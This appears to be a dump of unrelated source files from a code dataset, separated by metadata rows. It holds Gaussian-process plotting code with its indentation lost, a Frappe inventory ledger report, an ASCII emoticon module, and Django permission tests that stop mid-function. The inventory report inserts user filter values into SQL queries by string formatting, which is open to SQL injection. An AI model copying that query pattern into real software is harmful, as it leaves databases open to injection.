# ax[0].set_yticklabels([])
# ax[0].set_xticklabels([])
ax[0].set_title("Kernel matrix")
divider = make_axes_locatable(ax[0])
cax = divider.append_axes('right', size='5%', pad=0.05)
fig.colorbar(im1, cax=cax, orientation='vertical')
im2 = ax[1].imshow(dK)
# ax[1].spines['top'].set_visible(False)
# ax[1].spines['bottom'].set_visible(False)
# ax[1].spines['right'].set_visible(False)
# ax[1].spines['left'].set_visible(False)
# ax[1].tick_params(left=False, right=False, top=False, bottom=False)
# # Turn off tick labels
# ax[1].set_yticklabels([])
# ax[1].set_xticklabels([])
ax[1].set_title("Kernel derivative")
# at = AnchoredText("Iteration: {}".format(iteration),
# prop=dict(size=15), frameon=True,
# loc='lower right',
# )
# at.patch.set_boxstyle("round,pad=0.,rounding_size=0.2")
# ax[1].add_artist(at)
fig.suptitle('Iteration: {}'.format(iteration), fontsize=16)
divider = make_axes_locatable(ax[1])
cax = divider.append_axes('right', size='5%', pad=0.05)
fig.colorbar(im2, cax=cax, orientation='vertical')
# plt.tight_layout()
plt.savefig("quick_svgd/kernels/{}".format(filename))
plt.close()
def make_sgpr_plot(model,
particles,
Xfull,
Yfull,
X,
Y,
mu,
sigma,
logf,
gif=False):
n_iter = len(logf)
with plt.style.context("seaborn-notebook"):
fig = plt.figure(figsize=(18, 8))
layout = (2, 2)
predict_ax = plt.subplot2grid(layout, (0, 0), colspan=2)
mll_ax = plt.subplot2grid(layout, (1, 0))
particle_ax = plt.subplot2grid(layout, (1, 1))
mll_ax.plot(logf, label="steingp", linewidth=2)
mll_ax.set_xlabel("Optimisation iteration")
mll_ax.set_ylabel("Marginal log-likelihood")
mll_ax.legend(loc="lower right")
if gif:
mll_ax.set_ylim(-70, -20)
predict_ax.plot(Xfull,
Yfull.flatten(),
label="Latent function",
color="green",
alpha=0.5)
predict_ax.plot(Xfull, mu, label="Predictive mean", color="blue")
predict_ax.fill_between(Xfull[:, 0],
mu[:, 0].numpy() - 1.96 * sigma[:, 0].numpy(),
mu[:, 0].numpy() + 1.96 * sigma[:, 0].numpy(),
alpha=0.2,
label="Predictive_uncertainty",
color="blue")
predict_ax.plot(X,
Y,
'o',
color="black",
markersize=5,
label="Training points")
handles, labels = predict_ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
predict_ax.legend(handles, labels, loc='upper left')
predict_ax.set_xlabel("X")
predict_ax.set_ylabel("Y")
if gif:
predict_ax.set_ylim(-1.75, 2.25)
cols = plt.rcParams['axes.prop_cycle'].by_key()['color']
for p, lab, col, pa in zip(particles,
['Lengthscale', 'Variance', 'Obs. noise'],
cols[:particles.shape[0]],
model.trainable_parameters):
particle_ax.axhline(pa.transform(np.mean(p)).numpy(),
alpha=0.7,
color=col)
particle_ax.text(particles.shape[1],
pa.transform(np.mean(p)).numpy(),
"{} mean".format(lab))
particle_ax.plot(pa.transform(p).numpy(),
'o',
label=lab,
color=col)
handles, labels = particle_ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
particle_ax.legend(handles, labels, loc='best')
particle_ax.set_xlabel("Particle index")
particle_ax.set_ylabel("Particle value")
particle_ax.set_title("Final SVGD particles")
particle_ax.set_xticks(np.arange(particles.shape[1] + 1))
if gif:
particle_ax.set_ylim(-0.2, 0.8)
plt.tight_layout()
plt.figtext(
0.5,
0.96,
"Recovering a realisation from a GP with lengthscale=0.2, variance=0.3 and obs. noise=0.2",
wrap=True,
horizontalalignment='center',
fontsize=12)
plt.show()
# if gif:
# plt.savefig("quick_svgd/gif/{}_signal_recovery.png".format(
# int((n_iter - 1) / 10)))
# else:
# plt.savefig("quick_svgd/sgpr_output.png")
plt.close(fig)
def make_breathe_plot(model,
particles,
Xfull,
Yfull,
X,
Y,
Xte,
Yte,
mu,
sigma,
logf,
gif=False):
n_iter = len(logf)
adam_mll = pd.read_csv("quick_svgd/adam_1particle_comparison.csv")
with plt.style.context("seaborn-notebook"):
fig = plt.figure(figsize=(18, 8))
layout = (2, 2)
predict_ax = plt.subplot2grid(layout, (0, 0), colspan=2)
mll_ax = plt.subplot2grid(layout, (1, 0))
particle_ax = plt.subplot2grid(layout, (1, 1))
mll_ax.plot(logf, label="steingp", linewidth=2)
# mll_ax.plot(adam_mll, label="Adam Opt.", linewidth=2)
mll_ax.set_xlabel("Optimisation iteration")
mll_ax.set_ylabel("Marginal log-likelihood")
mll_ax.legend(loc="lower right")
if gif:
mll_ax.set_ylim(-70, -20)
predict_ax.plot(Xfull,
Yfull.flatten(),
label="True data_old",
color="green",
alpha=0.5)
predict_ax.plot(Xte, mu, label="Predictive mean", color="blue")
predict_ax.fill_between(Xte[:, 0],
mu[:, 0] - 1.96 * sigma[:, 0],
mu[:, 0] + 1.96 * sigma[:, 0],
alpha=0.2,
label="Predictive_uncertainty",
color="blue")
# TODO: Fix inducing point plot
# predict_ax.plot(model.inducing_variable.Z.numpy(),
# 'o',
# color="black",
# markersize=6,
# label="Inducing points")
handles, labels = predict_ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
predict_ax.legend(handles, labels, loc='upper left')
predict_ax.set_xlabel("X")
predict_ax.set_ylabel("Y")
if gif:
predict_ax.set_ylim(-1.75, 2.25)
cols = plt.rcParams['axes.prop_cycle'].by_key()['color']
for p, lab, col, pa in zip(particles,
['Lengthscale', 'Variance', 'Obs. noise'],
cols[:particles.shape[0]],
model.trainable_parameters):
particle_ax.axhline(pa.transform(np.mean(p)).numpy(),
alpha=0.7,
color=col)
particle_ax.text(particles.shape[1],
pa.transform(np.mean(p)).numpy(),
"{} mean".format(lab))
particle_ax.plot(pa.transform(p).numpy(),
'o',
label=lab,
color=col)
handles, labels = particle_ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
particle_ax.legend(handles, labels, loc='best')
particle_ax.set_xlabel("Particle index")
particle_ax.set_ylabel("Particle value")
particle_ax.set_title("Final SVGD particles")
particle_ax.set_xticks(np.arange(particles.shape[1] + 1))
if gif:
particle_ax.set_ylim(-0.2, 0.8)
plt.tight_layout()
plt.figtext(0.5,
0.94,
"Predictions of the Whitecross AQ station",
wrap=True,
horizontalalignment='center',
fontsize=12)
if gif:
plt.savefig("quick_svgd/gif/{}_signal_recovery.png".format(
int((n_iter - 1) / 10)))
else:
plt.savefig("quick_svgd/breathe_output.png")
plt.close(fig)
def complement(l, universe=None):
"""
Return the complement of a list of integers, as compared to
a given "universe" set. If no universe is specified,
consider the universe to be all integers between
the minimum and maximum values of the given list.
"""
if universe is not None:
universe = set(universe)
else:
universe = set(range(min(l), max(l) + 1))
return sorted(universe - set(l))
def make_gpmc_plot(model,
particles,
Xfull,
Yfull,
X,
Y,
mu,
sigma,
logf,
gif=False):
n_iter = len(logf)
with plt.style.context("seaborn-notebook"):
fig = plt.figure(figsize=(18, 8))
layout = (2, 2)
predict_ax = plt.subplot2grid(layout, (0, 0), colspan=2)
mll_ax = plt.subplot2grid(layout, (1, 0))
particle_ax = plt.subplot2grid(layout, (1, 1))
mll_ax.plot(logf, label="steingp", linewidth=2)
mll_ax.set_xlabel("Optimisation iteration")
mll_ax.set_ylabel("Marginal log-likelihood")
mll_ax.legend(loc="lower right")
if gif:
mll_ax.set_ylim(-70, -20)
predict_ax.plot(Xfull,
Yfull.flatten(),
label="Latent function",
color="green",
alpha=0.5)
predict_ax.plot(Xfull, mu, label="Predictive mean", color="blue")
predict_ax.fill_between(Xfull[:, 0],
mu[:, 0].numpy() - 1.96 * sigma[:, 0].numpy(),
mu[:, 0].numpy() + 1.96 * sigma[:, 0].numpy(),
alpha=0.2,
label="Predictive_uncertainty",
color="blue")
predict_ax.plot(X,
Y,
'o',
color="black",
markersize=5,
label="Training points")
handles, labels = predict_ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
predict_ax.legend(handles, labels, loc='upper left')
predict_ax.set_xlabel("X")
predict_ax.set_ylabel("Y")
if gif:
predict_ax.set_ylim(-1.75, 2.25)
cols = plt.rcParams['axes.prop_cycle'].by_key()['color']
for idx, (p, lab, col, pa) in enumerate(
zip(particles, [
'', 'Matern Lengthscale', 'Matern Variance',
'Bias Variance', "obs_noise"
], cols[:particles.shape[0]], model.trainable_parameters)):
if idx != 0:
particle_ax.axhline(pa.transform(np.mean(p)).numpy(),
alpha=0.7,
color=col)
particle_ax.text(particles.shape[1] + 0.1,
pa.transform(np.mean(p)).numpy(),
"{} mean".format(lab))
particle_ax.plot(pa.transform(p).numpy(),
'o',
label=lab,
color=col,
markersize=5,
alpha=0.8)
handles, labels = particle_ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
particle_ax.legend(handles, labels, loc='best')
particle_ax.set_xlabel("Particle index")
particle_ax.set_ylabel("Particle value")
particle_ax.set_title("Final SVGD particles")
particle_ax.set_xticks(np.arange(particles.shape[1] + 1))
if gif:
particle_ax.set_ylim(-0.2, 0.8)
plt.tight_layout()
plt.figtext(0.5,
0.96,
"SVGD to fit exponential data_old",
wrap=True,
horizontalalignment='center',
fontsize=12)
if gif:
plt.savefig("quick_svgd/gif/{}_signal_recovery.png".format(
int((n_iter - 1) / 10)))
else:
plt.savefig("quick_svgd/exponential_nparticles_gaussian.png")
plt.close(fig)
def make_bern_plot(model,
particles,
Xfull,
Yfull,
X,
Y,
mu,
sigma,
logf,
gif=False):
n_iter = len(logf)
samples = model.predict_f_samples(Xfull, 10).numpy().squeeze().T
with plt.style.context("seaborn-notebook"):
fig = plt.figure(figsize=(18, 8))
layout = (2, 2)
predict_ax = plt.subplot2grid(layout, (0, 0), colspan=2)
mll_ax = plt.subplot2grid(layout, (1, 0))
particle_ax = plt.subplot2grid(layout, (1, 1))
mll_ax.plot(logf, label="steingp", linewidth=2)
mll_ax.set_xlabel("Optimisation iteration")
mll_ax.set_ylabel("Marginal log-likelihood")
mll_ax.legend(loc="lower right")
if gif:
mll_ax.set_ylim(-70, -20)
predict_ax.plot(Xfull, mu, label="Predictive mean", color="blue")
predict_ax.fill_between(Xfull[:, 0],
mu[:, 0].numpy() - 1.96 * sigma[:, 0].numpy(),
mu[:, 0].numpy() + 1.96 * sigma[:, 0].numpy(),
alpha=0.2,
label="Predictive_uncertainty",
color="blue")
predict_ax.scatter(X,
Y,
marker='o',
color="red",
label="Training points",
alpha=0.7)
predict_ax.scatter(Xfull,
Yfull.flatten(),
marker="x",
label="Original dataset",
color="green",
alpha=0.7)
handles, labels = predict_ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
predict_ax.legend(handles, labels, loc='upper left')
predict_ax.set_xlabel("X")
predict_ax.set_ylabel("Y")
if gif:
predict_ax.set_ylim(-1.75, 2.25)
cols = plt.rcParams['axes.prop_cycle'].by_key()['color']
for idx, (p, lab, col, pa) in enumerate(
zip(particles, [
'', 'Matern Lengthscale', 'Matern Variance',
'Bias Variance', "obs_noise"
], cols[:particles.shape[0]], model.trainable_parameters)):
if idx != 0:
particle_ax.axhline(pa.transform(np.mean(p)).numpy(),
alpha=0.7,
color=col)
particle_ax.text(particles.shape[1] + 0.1,
pa.transform(np.mean(p)).numpy(),
"{} mean".format(lab))
particle_ax.plot(pa.transform(p).numpy(),
'o',
label=lab,
color=col,
markersize=5,
alpha=0.8)
handles, labels = particle_ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
particle_ax.legend(handles, labels, loc='best')
particle_ax.set_xlabel("Particle index")
particle_ax.set_ylabel("Particle value")
particle_ax.set_title("Final SVGD particles")
particle_ax.set_xticks(np.arange(particles.shape[1] + 1))
if gif:
particle_ax.set_ylim(-0.2, 0.8)
plt.tight_layout()
plt.figtext(0.5,
0.96,
"SVGD to fit exponential data_old",
wrap=True,
horizontalalignment='center',
fontsize=12)
if gif:
plt.savefig("quick_svgd/gif/{}_signal_recovery.png".format(
int((n_iter - 1) / 10)))
else:
plt.savefig("plots/toy_data/bernoulli_nparticles.png")
plt.close(fig)
| 40.350734 | 103 | 0.488741 | 2,760 | 24,735 | 4.239493 | 0.114493 | 0.025212 | 0.027775 | 0.029485 | 0.818477 | 0.800444 | 0.769592 | 0.757286 | 0.751645 | 0.747543 | 0 | 0.029205 | 0.385365 | 24,735 | 612 | 104 | 40.416667 | 0.740446 | 0.06699 | 0 | 0.80381 | 0 | 0.00381 | 0.104346 | 0.019774 | 0 | 0 | 0 | 0.001634 | 0 | 1 | 0.019048 | false | 0 | 0.011429 | 0 | 0.034286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
da3563047c6e60c20941187335c4f3a31f8afa3c | 6,143 | py | Python | inventory/inventory/report/inventory_ledger/inventory_ledger.py | riconova92/inventory | 7cc4f49bda31f802af36ee4ea6eb43092b5094a7 | [
"MIT"
] | null | null | null | inventory/inventory/report/inventory_ledger/inventory_ledger.py | riconova92/inventory | 7cc4f49bda31f802af36ee4ea6eb43092b5094a7 | [
"MIT"
] | null | null | null | inventory/inventory/report/inventory_ledger/inventory_ledger.py | riconova92/inventory | 7cc4f49bda31f802af36ee4ea6eb43092b5094a7 | [
"MIT"
] | null | null | null | # Copyright (c) 2013, Myme and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
def execute(filters=None):
columns, data = [], []
columns = ["Item Code:Link/Item:100","Colour:Link/Colour:100","Yard/Meter:Float:100","Group:Data:100",
"In Qty:Float:100","Out Qty:Float:100","Document:Link/DocType:100","Document No:Dynamic Link/Document:100"]
item_clause = ""
if filters.get("item") :
item_clause = """ AND j.`item_code_variant` = "{0}" """.format(filters.get("item"))
document_no_clause = ""
if filters.get("document_no") :
document_no_clause = """ AND i.`name`="{0}" """.format(filters.get("document_no"))
data = []
if not filters.get("document") :
new_data = frappe.db.sql("""
SELECT j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,j.`total_roll`,0,
"Packing List Receipt",i.`name` FROM `tabPacking List Receipt`i JOIN `tabPacking List Receipt Data`j ON i.`name`=j.`parent`
WHERE i.`docstatus`=1
{0} {1}
ORDER BY j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`
""".format(document_no_clause,item_clause),as_list=1)
data = data + new_data
new_data = frappe.db.sql("""
SELECT j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,0,j.`total_roll`,
"Packing List Receipt",i.`name` FROM `tabPacking List Delivery`i JOIN `tabPacking List Delivery Data`j ON i.`name`=j.`parent`
WHERE i.`docstatus`=1
{0} {1}
ORDER BY j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`
""".format(document_no_clause,item_clause),as_list=1)
data = data + new_data
new_data = frappe.db.sql("""
SELECT * FROM
(
SELECT j.`item_code_roll`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,j.`total_roll` AS `in_qty`, 0 AS `out_qty`,"Stock Recon Inventory" AS `document`,i.`name`
FROM `tabStock Recon Inventory`i JOIN `tabStock Recon Inventory Item`j ON i.`name`=j.`parent` WHERE i.`docstatus`=1 {0} {1}
UNION ALL
SELECT j.`item_code_roll`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,0 AS `in_qty`, j.`total_roll` AS `out_qty`,"Stock Recon Inventory" AS `document`,i.`name`
FROM `tabStock Recon Inventory`i JOIN `tabStock Recon Inventory Item Out`j ON i.`name`=j.`parent` WHERE i.`docstatus`=1 {0} {1}
)d
ORDER BY d.`item_code_roll`,d.`colour`,d.`yard_atau_meter_per_roll`,d.`group`
""".format(document_no_clause,item_clause),as_list=1)
data = data + new_data
new_data = frappe.db.sql("""
SELECT * FROM
(
SELECT j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,j.`total_roll` AS `in_qty`,0 AS `out_qty`,"Repack Inventory",i.`name`
FROM `tabRepack Inventory`i JOIN `tabRepack Inventory Item`j ON i.`name`=j.`parent` WHERE i.`docstatus`=1 AND j.`status`="To" {0} {1}
UNION ALL
SELECT j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,0 AS `in_qty`,j.`total_roll` AS `out_qty`,"Repack Inventory",i.`name`
FROM `tabRepack Inventory`i JOIN `tabRepack Inventory Item`j ON i.`name`=j.`parent` WHERE i.`docstatus`=1 AND j.`status`="From" {0} {1}
)d
ORDER BY d.`item_code_variant`,d.`colour`,d.`yard_atau_meter_per_roll`,d.`group`
""".format(document_no_clause,item_clause),as_list=1)
data = data + new_data
elif filters.get("document") == "Packing List Receipt" :
data = frappe.db.sql("""
SELECT j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,j.`total_roll`,0,
"Packing List Receipt",i.`name` FROM `tabPacking List Receipt`i JOIN `tabPacking List Receipt Data`j ON i.`name`=j.`parent`
WHERE i.`docstatus`=1
{0} {1}
ORDER BY j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`
""".format(document_no_clause,item_clause),as_list=1)
elif filters.get("document") == "Packing List Delivery" :
data = frappe.db.sql("""
SELECT j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,0,j.`total_roll`,
"Packing List Receipt",i.`name` FROM `tabPacking List Delivery`i JOIN `tabPacking List Delivery Data`j ON i.`name`=j.`parent`
WHERE i.`docstatus`=1
{0} {1}
ORDER BY j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`
""".format(document_no_clause,item_clause),as_list=1)
elif filters.get("document") == "Stock Recon Inventory" :
data = frappe.db.sql("""
SELECT * FROM
(
SELECT j.`item_code_roll`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,j.`total_roll` AS `in_qty`, 0 AS `out_qty`,"Stock Recon Inventory" AS `document`,i.`name`
FROM `tabStock Recon Inventory`i JOIN `tabStock Recon Inventory Item`j ON i.`name`=j.`parent` WHERE i.`docstatus`=1 {0} {1}
UNION ALL
SELECT j.`item_code_roll`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,0 AS `in_qty`, j.`total_roll` AS `out_qty`,"Stock Recon Inventory" AS `document`,i.`name`
FROM `tabStock Recon Inventory`i JOIN `tabStock Recon Inventory Item Out`j ON i.`name`=j.`parent` WHERE i.`docstatus`=1 {0} {1}
)d
ORDER BY d.`item_code_roll`,d.`colour`,d.`yard_atau_meter_per_roll`,d.`group`
""".format(document_no_clause,item_clause),as_list=1)
elif filters.get("document") == "Repack Inventory" :
data = frappe.db.sql("""
SELECT * FROM
(
SELECT j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,j.`total_roll` AS `in_qty`,0 AS `out_qty`,"Repack Inventory",i.`name`
FROM `tabRepack Inventory`i JOIN `tabRepack Inventory Item`j ON i.`name`=j.`parent` WHERE i.`docstatus`=1 AND j.`status`="To" {0} {1}
UNION ALL
SELECT j.`item_code_variant`,j.`colour`,j.`yard_atau_meter_per_roll`,j.`group`,0 AS `in_qty`,j.`total_roll` AS `out_qty`,"Repack Inventory",i.`name`
FROM `tabRepack Inventory`i JOIN `tabRepack Inventory Item`j ON i.`name`=j.`parent` WHERE i.`docstatus`=1 AND j.`status`="From" {0} {1}
)d
ORDER BY d.`item_code_variant`,d.`colour`,d.`yard_atau_meter_per_roll`,d.`group`
""".format(document_no_clause,item_clause),as_list=1)
return columns, data
| 51.621849 | 170 | 0.687937 | 1,021 | 6,143 | 3.940255 | 0.083252 | 0.031071 | 0.064628 | 0.079543 | 0.865026 | 0.865026 | 0.854089 | 0.854089 | 0.854089 | 0.854089 | 0 | 0.016236 | 0.137718 | 6,143 | 118 | 171 | 52.059322 | 0.743251 | 0.014488 | 0 | 0.757895 | 0 | 0.252632 | 0.786482 | 0.273674 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010526 | false | 0 | 0.021053 | 0 | 0.042105 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
da4b0d7afa5f1f67a7c542580012e226da2f4368 | 5,381 | py | Python | emoticon.py | moontr3/emoticon | 698a0efccd5e6efe2dd2e2d8abc07a89d7f7d266 | [
"CC0-1.0"
] | 1 | 2022-03-28T09:51:06.000Z | 2022-03-28T09:51:06.000Z | emoticon.py | moontr3/emoticon | 698a0efccd5e6efe2dd2e2d8abc07a89d7f7d266 | [
"CC0-1.0"
] | null | null | null | emoticon.py | moontr3/emoticon | 698a0efccd5e6efe2dd2e2d8abc07a89d7f7d266 | [
"CC0-1.0"
] | null | null | null | """
###################################################
# #
# Made by moontr3, 2022. All rights reserved. #
# #
###################################################
_ _ _
| | | | _____ __ | |_ ___ _ _ ___ ___ _
| |_| |/ _ \ \ /\ / / | __/ _ \ | | | / __|/ _ (_)
| _ | (_) \ V V / | || (_) | | |_| \__ \ __/_
|_| |_|\___/ \_/\_/ \__\___/ \__,_|___/\___(_)
----------------------------------
emoticon.get_emoticon(text=str, is_sitting=bool, left_hand_up=bool, right_hand_up=bool, round_message=bool)
Return emoticon (string) with text <text>
emoticon.print_emoticon(text=str, is_sitting=bool, left_hand_up=bool, right_hand_up=bool, round_message=bool)
Print emoticon with text <text>
----------------------------------
==================================
----------------------------------
_____ _ _
| ____|_ ____ _ _ __ ___ _ __ | | ___ ___ ___ __| | ___ _
| _| \ \/ / _` | '_ ` _ \| '_ \| |/ _ \ / __/ _ \ / _` |/ _ (_)
| |___ > < (_| | | | | | | |_) | | __/ | (_| (_) | (_| | __/_
|_____/_/\_\__,_|_| |_| |_| .__/|_|\___| \___\___/ \__,_|\___(_)
|_|
----------------------------------
==================================
import emoticon
text = emoticon.get_emoticon("Hello world!")
----------------------------------
Putting emoticon with text "Hello world!" into the variable
----------------------------------
==================================
import emoticon
emoticon.print_emoticon("Hello world")
----------------------------------
Putting emoticon with text "Hello world!" into the variable
----------------------------------
==================================
import emoticon
text = emoticon.get_emoticon("Hello world!", is_sitting=True)
print(text)
----------------------------------
Putting emoticon that are sitting with text "Hello world!" into the variable and then printing it
"""
###################################################
def get_emoticon(text="How to use: get_emoticon(text=str, is_sitting=bool, left_hand_up=bool, right_hand_up=bool, round_message=bool)", is_sitting=False, left_hand_up=False, right_hand_up=False, round_message=True):
top_part = " O "
middle_part = "/|\ "
bottom_part = "/ \ "
if is_sitting == False:
pass
elif is_sitting == True:
bottom_part = "<-> "
else:
return "is_sitting isn't a boolean variable."
if left_hand_up == False and right_hand_up == False:
pass
elif left_hand_up == True and right_hand_up == False:
top_part = "\O "
middle_part = " |\ "
elif left_hand_up == False and right_hand_up == True:
top_part = " O/ "
middle_part = "/| "
elif left_hand_up == True and right_hand_up == True:
top_part = "\O/ "
middle_part = " | "
else:
return "left_hand_up and/or right_hand_up isn't a boolean variable(-s)."
if "\n" in text:
return "Text cannot be multiline."
if round_message == False:
message_outline = "=" * len(text)
text = f'''
{message_outline}
<{text}>
{message_outline}
/
{top_part}
{middle_part}
{bottom_part}
'''
elif round_message == True:
message_outline = "-" * (len(text)-1)
text = f'''
,{message_outline}-,
|{text}|
`v{message_outline}`
{top_part}
{middle_part}
{bottom_part}
'''
else:
return "round_message isn't a boolean variable."
return text
###################################################
def print_emoticon(text="How to use: print_emoticon(text=str, is_sitting=bool, left_hand_up=bool, right_hand_up=bool, round_message=bool)", is_sitting=False, left_hand_up=False, right_hand_up=False, round_message=True):
top_part = " O "
middle_part = "/|\ "
bottom_part = "/ \ "
if is_sitting == False:
pass
elif is_sitting == True:
bottom_part = "<-> "
else:
print("is_sitting isn't a boolean variable.")
if left_hand_up == False and right_hand_up == False:
pass
elif left_hand_up == True and right_hand_up == False:
top_part = "\O "
middle_part = " |\ "
elif left_hand_up == False and right_hand_up == True:
top_part = " O/ "
middle_part = "/| "
elif left_hand_up == True and right_hand_up == True:
top_part = "\O/ "
middle_part = " | "
else:
print("left_hand_up and/or right_hand_up isn't a boolean variable(-s).")
if "\n" in text:
print("Text cannot be multiline.")
if round_message == False:
message_outline = "=" * len(text)
text = f'''
{message_outline}
<{text}>
{message_outline}
/
{top_part}
{middle_part}
{bottom_part}
'''
elif round_message == True:
message_outline = "-" * (len(text)-1)
text = f'''
,{message_outline}-,
|{text}|
`v{message_outline}`
{top_part}
{middle_part}
{bottom_part}
'''
else:
print("round_message isn't a boolean variable.")
print(text)
###################################################
| 29.729282 | 219 | 0.478721 | 524 | 5,381 | 4.335878 | 0.129771 | 0.084507 | 0.070423 | 0.049296 | 0.882482 | 0.864877 | 0.864877 | 0.822183 | 0.794894 | 0.794894 | 0 | 0.001792 | 0.273927 | 5,381 | 180 | 220 | 29.894444 | 0.579729 | 0.383386 | 0 | 0.857143 | 0 | 0.020408 | 0.373139 | 0.014571 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020408 | false | 0.040816 | 0 | 0 | 0.071429 | 0.061224 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
da5ad4a45aff6162f95f2d38873a0742bdba237e | 5,762 | py | Python | app/test/test_permissions.py | livra-ar/backend | eb052611bb9b2cfa360fa422ce059984b8d295fa | [
"BSD-2-Clause"
] | 1 | 2020-09-05T12:18:06.000Z | 2020-09-05T12:18:06.000Z | app/test/test_permissions.py | thamidurm/ar-content-platform-backend | eb052611bb9b2cfa360fa422ce059984b8d295fa | [
"BSD-2-Clause"
] | 3 | 2021-06-09T17:46:46.000Z | 2021-09-22T18:54:57.000Z | app/test/test_permissions.py | livra-ar/backend | eb052611bb9b2cfa360fa422ce059984b8d295fa | [
"BSD-2-Clause"
] | null | null | null | from unittest.mock import MagicMock
from app.permissions import IsOwnerOfBookOrReadOnly, IsOwnerOfContentOrReadOnly
from django.test import TestCase
from app.models import *
from rest_framework import permissions
class IsOwnerOfBookOrReadOnlyTest(TestCase):
def tearDown(cls):
mongoengine.get_connection().drop_database('testdb')
def setUp(self):
self.creator1 = Creator(
email='user2@example.com',
name='User',
password='password'
)
self.creator1.save()
self.creator2 = Creator(
email='user3@example.com',
name='User2',
password='password'
)
self.book = Book(
title='Book Title #1',
authors=['Author #1'],
isbns=['111111111111'],
covers=['http://www.example.com/cover.png'],
publisher=self.creator1,
)
self.book.save()
self.view = MagicMock()
self.permission = IsOwnerOfBookOrReadOnly()
def test_has_object_permission_success_for_safe_methods(self):
obj = MagicMock(publisher=None)
for method in permissions.SAFE_METHODS:
request = MagicMock(method='GET', user=self.creator1)
self.assertTrue(self.permission.has_object_permission(request, self.view, obj))
def test_has_object_permission_success_for_unsafe_methods(self):
obj = MagicMock(publisher=self.creator1)
for method in ['POST', 'PUT', 'DELETE']:
request = MagicMock(method='POST', user=self.creator1)
self.assertTrue(self.permission.has_object_permission(request, self.view, obj))
def test_has_object_permission_failure_for_unsafe_methods(self):
obj = MagicMock(publisher=self.creator1)
for method in ['POST', 'PUT', 'DELETE']:
request = MagicMock(method='POST', user=self.creator2)
self.assertFalse(self.permission.has_object_permission(request, self.view, obj))
def test_has_permission_success_for_safe_methods(self):
for method in permissions.SAFE_METHODS:
request = MagicMock(method='GET', user=self.creator1)
self.assertTrue(self.permission.has_permission(request, self.view))
def test_has_permission_success_for_unsafe_methods(self):
for method in ['POST', 'PUT', 'DELETE']:
request = MagicMock(method='POST', user=self.creator1)
self.assertTrue(self.permission.has_permission(request, self.view))
def test_has_permission_failure_for_unsafe_methods(self):
for method in ['POST', 'PUT', 'DELETE']:
request = MagicMock(method='POST', user=self.creator2, data = {
'id': self.book.id
})
self.assertFalse(self.permission.has_permission(request, self.view))
class IsOwnerOfContentOrReadOnlyTest(TestCase):
def tearDown(cls):
mongoengine.get_connection().drop_database('testdb')
def setUp(self):
self.creator1 = Creator(
email='user2@example.com',
name='User',
password='password'
)
self.creator1.save()
self.creator2 = Creator(
email='user3@example.com',
name='User2',
password='password'
)
self.book = Book(
title='Book Title #1',
authors=['Author #1'],
isbns=['111111111111'],
covers=['http://www.example.com/cover.png'],
publisher=self.creator1,
)
self.book.save()
self.content = Content(
title="Content Title #1",
description="Content Description #1",
images=['https://www.example.com/image.png'],
creator=self.creator1,
book=self.book,
file='https://www.example.com/file.zip'
)
self.content.save()
self.view = MagicMock()
self.permission = IsOwnerOfContentOrReadOnly()
def test_has_object_permission_success_for_safe_methods(self):
obj = MagicMock(creator=None)
for method in permissions.SAFE_METHODS:
request = MagicMock(method='GET', user=self.creator1)
self.assertTrue(self.permission.has_object_permission(request, self.view, obj))
def test_has_object_permission_success_for_unsafe_methods(self):
obj = MagicMock(creator=self.creator1)
for method in ['POST', 'PUT', 'DELETE']:
request = MagicMock(method='POST', user=self.creator1)
self.assertTrue(self.permission.has_object_permission(request, self.view, obj))
def test_has_object_permission_failure_for_unsafe_methods(self):
obj = MagicMock(creator=self.creator1)
for method in ['POST', 'PUT', 'DELETE']:
request = MagicMock(method='POST', user=self.creator2)
